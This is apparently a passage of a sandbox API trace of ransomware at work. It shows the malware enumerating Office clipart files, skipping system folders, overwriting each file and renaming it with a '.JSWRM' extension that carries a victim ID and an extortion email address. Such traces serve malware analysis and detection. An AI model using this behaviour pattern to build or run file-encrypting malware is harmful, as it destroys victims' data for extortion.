0x23dbc0 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.080] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01242_.WMF", cAlternateFileName="")) returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2=".") returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="..") returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="...") returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="windows") returned -1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="recovery") returned -1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="perflogs") returned -1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="documents and settings") returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="system volume information") returned -1 [0079.080] lstrcmpiW (lpString1="HH01242_.WMF", lpString2="msocache") returned -1 [0079.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01242_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01242_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.083] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7340) returned 1 [0079.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ca0) returned 0x205850 [0079.083] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ca0, lpOverlapped=0x0) returned 1 [0079.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.085] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ca0, lpOverlapped=0x0) returned 1 [0079.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.085] CloseHandle (hObject=0x314) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0079.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0079.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0079.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.086] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3dbe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01291_.WMF", cAlternateFileName="")) returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2=".") returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="..") returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="...") returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="windows") returned -1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="recovery") returned -1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="perflogs") returned -1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="documents and settings") returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.086] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="system volume information") returned -1 [0079.087] lstrcmpiW (lpString1="HH01291_.WMF", lpString2="msocache") returned -1 [0079.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01291_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01291_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01291_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01291_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01291_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01291_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.087] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15806) returned 1 [0079.087] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3db0) returned 0x24d210 [0079.087] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3db0, lpOverlapped=0x0) returned 1 [0079.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.090] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3db0, lpOverlapped=0x0) returned 1 [0079.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.090] CloseHandle (hObject=0x314) returned 1 [0079.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0079.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0079.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0079.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.091] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.091] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1780, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01329_.WMF", cAlternateFileName="")) returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2=".") returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="..") returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="...") returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="windows") returned -1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="recovery") returned -1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="perflogs") returned -1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="documents and settings") returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.091] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="system volume information") returned -1 [0079.092] lstrcmpiW (lpString1="HH01329_.WMF", lpString2="msocache") returned -1 [0079.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01329_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01329_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01329_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01329_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01329_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01329_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.092] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6016) returned 1 [0079.092] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1780) returned 0x205850 [0079.092] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1780, lpOverlapped=0x0) returned 1 [0079.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.094] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1780, lpOverlapped=0x0) returned 1 [0079.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.094] CloseHandle (hObject=0x314) returned 1 [0079.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0079.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0079.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.095] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.095] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1746, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01461_.WMF", cAlternateFileName="")) returned 1 [0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2=".") returned 1 [0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="..") returned 1 [0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="...") returned 1 [0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="windows") returned -1 [0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="recovery") returned -1 